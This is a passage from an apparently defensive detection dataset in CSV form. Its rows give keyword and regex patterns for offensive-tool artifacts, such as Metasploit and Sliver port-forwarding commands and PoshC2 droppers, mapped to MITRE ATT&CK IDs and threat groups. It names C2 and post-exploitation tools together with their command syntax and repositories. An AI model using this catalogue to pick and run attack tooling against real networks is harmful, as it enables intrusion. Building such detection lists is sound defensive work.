T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55032" "*PortBender.sln*",".{0,1000}PortBender\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55033" "*PortBender.zip*",".{0,1000}PortBender\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - 
Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55034" "*portfwd add ?l *-p *-r *",".{0,1000}portfwd\sadd\s\?l\s.{0,1000}\-p\s.{0,1000}\-r\s.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Port forwarding","10","10","N/A","N/A","N/A","N/A","55035" "*portfwd add --bind *",".{0,1000}portfwd\sadd\s\-\-bind\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55036" "*portfwd add -r *",".{0,1000}portfwd\sadd\s\-r\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an 
open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55037" "*Ports can only be scanned in the active mode*",".{0,1000}Ports\scan\sonly\sbe\sscanned\sin\sthe\sactive\smode.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux #content","N/A","5","","N/A","","","","55056" "*Port-Scan.ps1*",".{0,1000}Port\-Scan\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55057" "*portscan.rc*",".{0,1000}portscan\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55058" "*portscan_result.cna*",".{0,1000}portscan_result\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","55059" "*portscan386 *",".{0,1000}portscan386\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","55060" "*portscan64 *",".{0,1000}portscan64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","55061" "*PortScan-Alive*",".{0,1000}PortScan\-Alive.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","55062" "*portscanner.js*",".{0,1000}portscanner\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","55063" "*portscanner.py*",".{0,1000}portscanner\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","55064" "*Portscan-Port*",".{0,1000}Portscan\-Port.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 
- TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","55065" "*portScanWithService.py*",".{0,1000}portScanWithService\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55066" "*portScanWithService.py*",".{0,1000}portScanWithService\.py.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","55067" "*portswigger.net*",".{0,1000}portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. 
This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","55068" "*portswigger.net*",".{0,1000}portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","0","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","55069" "*PortSwigger/http-request-smuggler*",".{0,1000}PortSwigger\/http\-request\-smuggler.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","55070" "*posh_in_mem*",".{0,1000}posh_in_mem.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","55071" "*posh_stageless.py*",".{0,1000}posh_stageless\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","55072" "*Posh_v4_dropper_*",".{0,1000}Posh_v4_dropper_.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55073" 
"*Posh_v4_x64_*.bin*",".{0,1000}Posh_v4_x64_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55074" "*Posh_v4_x86_*.bin*",".{0,1000}Posh_v4_x86_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55075" "*PoshADCS-master.zip*",".{0,1000}PoshADCS\-master\.zip.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - 
TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","55076" "*PoshC2-*.zip*",".{0,1000}PoshC2\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55077" "*poshc2.server*",".{0,1000}poshc2\.server.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55078" "*poshc2.service*",".{0,1000}poshc2\.service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral 
Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55079" "*poshc2-ansible-main.yml*",".{0,1000}poshc2\-ansible\-main\.yml.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
